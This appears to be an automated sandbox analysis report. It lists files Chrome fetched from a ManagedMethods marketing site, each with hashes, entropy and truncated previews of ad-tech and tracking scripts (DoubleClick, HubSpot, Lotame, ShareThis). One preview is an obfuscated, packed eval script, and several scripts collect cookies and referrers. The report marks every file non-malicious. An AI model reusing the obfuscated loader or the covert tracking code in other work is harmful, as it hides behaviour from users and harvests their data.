                                                                                                                                                                                                                                                                                                                                                                          Preview:(function() {. var dc = {};. var gu = false;. var su = "1040172889715587758A2B28B3F6BBD2";. var gm = false;. var cn = "__dtsu";. var lg = {cv:"US",cs:"C",rv:"NY",rs:"C"};.. String.prototype.dts_hash_code=function(){var hash=0;if(this.length==0)return hash;for(i=0;i<this.length;i++){char=this.charCodeAt(i);hash=((hash<<5)-hash)+char;hash=hash&hash} return hash;};.. function _dtsi() {. a = document.createElement("a"), a.href = window.location.href, _dts.host = a.hostname, "undefined" != typeof document.referrer && document.referrer.length > 0 ? (_dts.r = document.referrer, _dts.p = _dts_gp(_dts.r), "q" in _dts.p ? _dts.q = _dts.p.q : "query" in _dts.p ? _dts.q = _dts.p.query : "p" in _dts.p ? _dts.q = _dts.p.p : "text" in _dts.p ? _dts.q = _dts.p.text : "wd" in _dts.p ? _dts.q = _dts.p.wd : _dts.q = 0) : (_dts.r = 0, _dts.q = 0). }. var _dts = {};. _dtsi();.. function __dtsinit() {. var c = document.cookie.split(';');. for(i = c.le
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4925), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4925
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.818235868269397
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU2d8Kd3E07:1DY0hf1bT47OIqWb1/8Ku07
                                                                                                                                                                                                                                                                                                                                                                          MD5:B470DCC9DE2C809B06696C95DE5C09E7
                                                                                                                                                                                                                                                                                                                                                                          SHA1:33E729868D79EF171DF4C982309D58A640CFB479
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F079E218017F9CE1322D72FA97EF8277A9B75ED48D3A1C3C4D1719D8C932223D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8780EB8255F0255C73345DA2324341E49B1B41DC095B476671CD50432AD74CAB094447F4876714E0B1FC395F0D1E140E84902B593F478DFBCFB48A68495B2C18
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/927141988/?random=1728897184905&cv=11&fst=1728897184905&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 2320
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1384
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.808118802355832
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:XX9sBxG/OsaCezrBbGlCG/Labdy1t6oEPjZsuIPJE+nfLNZD:XX+BfsaxzSCIUy1t6oEsukJnJt
                                                                                                                                                                                                                                                                                                                                                                          MD5:20272454D2D6C9F0FEF2AAB9A7CA0514
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F11FFE17485758FACC6BBEAE5AC42A9775968B94
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E16EEE2C2F198F221EC9237D2283D8A69B0E76BB09B8B35F18F03B9A866D39AF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B4DE9D9E6D19B7FCF9FA14299340A499B241260A41A4758DA3B10C1AEA2F86B4C01E98D5F43CA87B0AA688C62C01DF874536AAA5AC7D38FA98D1ABD76042E908
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........V.S...W..G.6rB..W..%p.Ci../.........J.....#;....~I...Z.....B..,..3S..T9.;..W.A...j...:.jQ...e;.\\&....x..q....plW.s..T.m.8.P.K......4.S...oT.hk.3'..........O..."......-+c..0#.M1qS...RnZ...L...r.....6..9.=...APWy....."5.0)..\.'...6y.m..;...m..8.....frj..r.&N....e>.....(..q...n..;....2....).......!...1.s.^.68.Y\'M..w..C..LN..5.o=<8x.m\..k..j..."..f.z...I.....C.#a........8K...m3..Y.M......}.O.>.$..o..H...6~p..QVe.8...D..Se....9....}....z........(..|..CsZ.E......B/...gg...2..a.W)[.....E.9...RR..Wu^....o.p.#..].9A..~.K0...........o4.n.....k...d.L{.(......+Z.'..^.....F;.]S\..k.t~..R..f.$./...+2..Sssuv\..0.cW..0.?..=_...b.y....8H.........4.&I...A.Q....Q.@.|W....A..8....BD.!(8..q....l<.q#.aP4L...&.V.r^8......M=...S.%b.wq.g.~.A......)N.....G.p.f;.+Y..jg..~....Y. . ......w..}.-....... ...d..Q[.O.....yK.i....p..|...5.i."...kY..)....s.G........{....W:............y...<..G.J-.R..^..A..(5.q..;f.i..b+Yg.WG.O.G..6g)`..c.U...[...K.n...fu..%AQ.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):84726
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.280742507415713
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:8HyXWWcWdcBNieNO8DDejT5UKxfIzbFWX7Qg64Ai1nnaBgcl8705eZGXm:u8jWKxfI3+79
                                                                                                                                                                                                                                                                                                                                                                          MD5:77145A720CF77C42786728CE6CC65290
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E71265E0A1CF11029362ED8BE2CA5009276DDEF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8AF71FC879943FC0936E76F388252ECC78520EB8D1633E42229A07B95E4BCD00
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:744B7DE6F7FE894007DAE58208775B607CEDB0AC75C4A16B08E22CF6E8C21D4D3FE121F39B5AA2B5E10791AC076C6DC50AF3A96DE261D47BB2E7AEB70A86C6BF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.hubspot.com/web-interactives-embed.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){"use strict";const e={RECEIVED_ANALYTICS:"HS_CTA_PARENT_RECEIVED_ANALYTICS",DEVICE_TYPE:"HS_CTA_PARENT_DEVICE_TYPE",PROXY_ANALYTICS_FN_CALLBACK:"HS_CTA_PARENT_PROXY_ANALYTICS_FN",INIT:"HS_CTA_PARENT_INIT",SHOWING_CTA:"HS_CTA_SHOWING_CTA",SEND_EXTRACTED_STYLES:"HS_SEND_EXTRACTED_STYLES",STARTED:"HS_CTA_STARTED",NAVIGATE_PAGE:"HS_CTA_NAVIGATE_PAGE",CLICK_EVENT:"HS_CTA_CLICK_EVENT",CLOSE_INTERACTIVE:"HS_CTA_CLOSE_INTERACTIVE",HAS_CLOSED:"HS_CTA_HAS_CLOSED",NEW_HEIGHT:"HS_CTA_NEW_HEIGHT",DISPLAY_CALL_TO_ACTION:"HS_DISPLAY_CALL_TO_ACTION",PROXY_ANALYTICS:"HS_CTA_PROXY_ANALYTICS",PROXY_ANALYTICS_FN:"HS_CTA_PROXY_ANALYTICS_FN",SEND_FORM_DEFINITION:"HS_SEND_FORM_DEFINITION",SEND_CTA_CONFIG:"HS_SEND_CTA_CONFIG",SEND_EMBED_CONTEXT:"HS_SEND_EMBED_CONTEXT",RECEIVE_FILTERED_STYLESHEETS:"RECEIVE_FILTERED_STYLESHEETS",SEND_STYLESHEETS:"SEND_STYLESHEETS",RENDER_RECAPTCHA:"RENDER_RECAPTCHA",EXECUTE_RECAPTCHA:"EXECUTE_RECAPTCHA",RESET_RECAPTCHA:"RESET_RECAPTCHA",RECAPTCHA_SUCCESS:"RECAPTCHA_
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (63965), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):63965
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.415839533934785
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:Sa+O7y8yVCWTXTnkbnErQJe+ISMnfI2gpyrJZa6Dx76H1W7XAW2vr3:Sa+ZCkDiEcJe+ISMnxJjDy1EXAj3
                                                                                                                                                                                                                                                                                                                                                                          MD5:2AFD7A7856345176E1C9C378191AE043
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5E2C23320DDC06A4B00BBD81DC58D9D6A897401D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3029A59A3EB78E1675C02962B4C2EFA72C770B73C3336F95F14B4C73B7465397
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:139CB12A253E234E52C8B0E3F3FD6932E04250D2B8818EDC525939546B06852E26B17C1269AD5967FA2B9DCB965976C79EA9090168B04A457E769E2CC9457158
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tags.crwdcntrl.net/lt/c/3825/lt.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== 'undefined' && typeof console.log !== 'undefined' && typeof document.createElement !== 'undefined' ); }; if(!lotameIsCompatible()){ if(console && console.error){ console.error('Lotame: This browser does not meet the minimum requirements.'); } } else { function lt3825_aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function lt3825_a(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:lt3825_aa(a)}}var lt3825_ba="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},lt3825_b; if("function"==typeof Object.setPrototypeOf)lt3825_b=Object.setPrototypeOf;else{var lt3825_c;a:{var lt3825_ca={Vb:!0},lt3825_da={};try{lt38
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):135
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.936163260345646
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YVKBEivEXoMRL2KIhfwcP2xR2GXEqRWJ6jLZHJqCUXPTY:YihgbU2mn6jLZp3SU
                                                                                                                                                                                                                                                                                                                                                                          MD5:8AA89D38A2211D124A514A95BF9B8D85
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3159B0509A1C4EC4335152271FC6E85B26CAF6E4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5290C77870302BFFEE5B30D68B9F14869CA04C1AF0E6D1BA3D63DD52613494B9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9CD4F95ABDA664C2D807DE67F9980FED2559AE12D46AB879EB9E0522FF41D03795F4A74A6EFCABD7B9C8E47E4A74EB63FC06B1ECE825171D0AF937A3527FD740
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"portalId":6834707,"submissionsApiDomain":"forms.hubspot.com","reportScraperTest":false,"formCaptureEnabled":true,"token":-1954512136}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):51
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.726059410471684
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:QBRgyNq/HG9AikQKKP9GfwY:IgymGfkQKy9GfwY
                                                                                                                                                                                                                                                                                                                                                                          MD5:495338A6EFD6AF599E072D037124A01D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0CE5CD05BA2D3D6FDA67AE675167918A72C9B061
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5E82852016FA27FECC81C08D93F8DF436F32304F55DF9EEF33749DF41BFD74A0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:33B01333AA173AF721B27254192FF611CE7B86B57713A1EC6966744FBEBB4D589022C292126C7C9251323E29D349A1A317241E7459C591C6B0BE5EEBEF365D80
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:try{_dtspv.c({"b":"chrome@117"},'6lao');}catch(e){}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.67310758785311
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Guji4KtlT+YU9MpRa/zcFhxpLKiu/lHpegj5y72a4ukvzLx:vi4KtlTla/szp6yqaIvzLx
                                                                                                                                                                                                                                                                                                                                                                          MD5:4269AD5393B1CA281165D492E342E8EC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:41FE24BEA5FCAE815BD6A9EB804D676F365342A1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:15C7F8D034C3882DE3BCD23681ECECF664BBC31A1FA0BFD012318DE67B656B39
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:38F4DCF388450EA7BE51D7364931C097B34217A0743B37E7C3885FA6702FE1E96B44E3FC1D5692C542C33045AA86FB614FA7AF4A1A225FB9680021036B3B5E51
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function () {. try {.. // set up our pixel. var fcmp = typeof __cmp == 'function';. var fcmpv2 = typeof __tcfapi == 'function';. var rnd = Math.random();. var img = document.createElement('img');. var exptid = encodeURIComponent('ZHoAA2cM4IQAAAAICdw7Aw==');. var url = window.top.location === window.location ? window.location.toString() : document.referrer;. var img_src = 'https://pd.sharethis.com/pd/dtscout?_t_=px&url=' + encodeURIComponent(url) + '&event_source=dtscout' + '&rnd=' + rnd + '&exptid=' + exptid + '&fcmp=' + fcmp;. img.async = true;.. // set up the aqfer script. var pxscrpt = document.createElement('script');. pxscrpt.id = 'pxscrpt';. pxscrpt.async = true;. var pxscrpt_src = 'https://t.sharethis.com/1/k/t.dhj?cid=c010&cls=C&rnd=' + rnd + '&stid=' + exptid;.. var done = false;. function load() {. img.src = img_src;. document.body.appendChild(img);. pxscrpt.src = pxscrpt_src;. document.body.appendChild(pxs
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 2320
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1384
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.808118802355832
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:XX9sBxG/OsaCezrBbGlCG/Labdy1t6oEPjZsuIPJE+nfLNZD:XX+BfsaxzSCIUy1t6oEsukJnJt
                                                                                                                                                                                                                                                                                                                                                                          MD5:20272454D2D6C9F0FEF2AAB9A7CA0514
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F11FFE17485758FACC6BBEAE5AC42A9775968B94
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E16EEE2C2F198F221EC9237D2283D8A69B0E76BB09B8B35F18F03B9A866D39AF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B4DE9D9E6D19B7FCF9FA14299340A499B241260A41A4758DA3B10C1AEA2F86B4C01E98D5F43CA87B0AA688C62C01DF874536AAA5AC7D38FA98D1ABD76042E908
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://t.sharethis.com/1/k/t.dhj?cid=c010&cls=C&rnd=0.9666548919402609&stid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........V.S...W..G.6rB..W..%p.Ci../.........J.....#;....~I...Z.....B..,..3S..T9.;..W.A...j...:.jQ...e;.\\&....x..q....plW.s..T.m.8.P.K......4.S...oT.hk.3'..........O..."......-+c..0#.M1qS...RnZ...L...r.....6..9.=...APWy....."5.0)..\.'...6y.m..;...m..8.....frj..r.&N....e>.....(..q...n..;....2....).......!...1.s.^.68.Y\'M..w..C..LN..5.o=<8x.m\..k..j..."..f.z...I.....C.#a........8K...m3..Y.M......}.O.>.$..o..H...6~p..QVe.8...D..Se....9....}....z........(..|..CsZ.E......B/...gg...2..a.W)[.....E.9...RR..Wu^....o.p.#..].9A..~.K0...........o4.n.....k...d.L{.(......+Z.'..^.....F;.]S\..k.t~..R..f.$./...+2..Sssuv\..0.cW..0.?..=_...b.y....8H.........4.&I...A.Q....Q.@.|W....A..8....BD.!(8..q....l<.q#.aP4L...&.V.r^8......M=...S.%b.wq.g.~.A......)N.....G.p.f;.+Y..jg..~....Y. . ......w..}.-....... ...d..Q[.O.....yK.i....p..|...5.i."...kY..)....s.G........{....W:............y...<..G.J-.R..^..A..(5.q..;f.i..b+Yg.WG.O.G..6g)`..c.U...[...K.n...fu..%AQ.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4182)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4183
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.600886371626987
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:dwIQiT4udZLMrCrWf3DD05cNaN5rpMQDgcW3QxvPdBmAOt0RznhyDBqPh81wEasv:5cudZUCM3DssOv+OZhCQAqvEDMrQv
                                                                                                                                                                                                                                                                                                                                                                          MD5:914BB22428E0C51D8AA70B4E8EE31DA0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:36AA8446A4857B47E54FDD7635FB9E8552E51A4C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CFAC6379159622C5669DF9729C10CD6A801886AD458533283D9E19BA84107EBE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AEF7F94FD560B8F7AEE7797F98582C7D46F94C2D20F965AEA67CC1F4F432A1CE94A037271EBA78379024E526A0889651ABA5ABBC5C3DD864BB3BB932BD750448
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('F a=["\\h\\o\\j\\e\\l\\d","\\o\\j\\b\\g\\d\\b\\1q\\c\\b\\r\\b\\k\\d","\\d\\A\\l\\b","\\d\\b\\C\\d\\n\\I\\g\\K\\g\\h\\o\\j\\e\\l\\d","\\h\\j\\o","\\s\\d\\d\\l\\h\\1o\\n\\n\\g\\I\\g\\C\\q\\i\\f\\f\\i\\c\\b\\g\\l\\e\\h\\q\\o\\f\\r\\n\\g\\I\\g\\C\\n\\c\\e\\u\\h\\n\\I\\1j\\B\\b\\j\\A\\n\\Z\\q\\Z\\q\\1i\\n\\I\\1j\\B\\b\\j\\A\\q\\r\\e\\k\\q\\I\\h","\\g\\h\\A\\k\\o","\\f\\k\\c\\f\\g\\m","\\w\\y\\f\\f\\d\\b\\j\\x\\1p\\X\\V\\1R\\v\\T\\b\\r\\l\\c\\g\\d\\b\\v\\u\\A\\v\\e\\i\\k\\e\\b\\c\\q\\o\\f\\r\\w\\n\\y\\f\\f\\d\\b\\j\\x","\\g\\l\\l\\b\\k\\m","\\u\\f\\m\\A","\\e\\k\\y\\e\\k\\e\\d\\b\\1U\\h\\o\\j\\f\\c\\c","\\s\\d\\d\\l\\h\\1o\\n\\n\\1t\\q\\u\\l\\q\\u\\c\\f\\i\\h\\l\\f\\d
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://td.doubleclick.net/td/rul/927141988?random=1728903365512&cv=11&fst=1728903365512&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3325), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3325
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.842889507106002
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:4IgdIhdk/E4iPgH0ymH+aSaFf1PZklEBkNTUqe9zONalEGZr:9/WdGp7gy
                                                                                                                                                                                                                                                                                                                                                                          MD5:52FE592B2898D820309BA0157CA2F852
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5DF18DC60D5D36EED424122C874D3B560E85C864
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CA63EF6D3178C506E33EC6AFE044BB75A135186F19D91C62019E7493E6E970E8
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E166EDA63316BA426B80394123D18DCB25E639026EA5390ED2230C544720FDA5670AD68AE0DD359A47B2D2D047BF7204ED24FB059D330CE30C03571E6DE9E3F7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs-fs/hub/6834707/hub_generated/module_assets/175893307026/1723836629600/module_175893307026_Testimonials_Slider_Overlapping.min.css
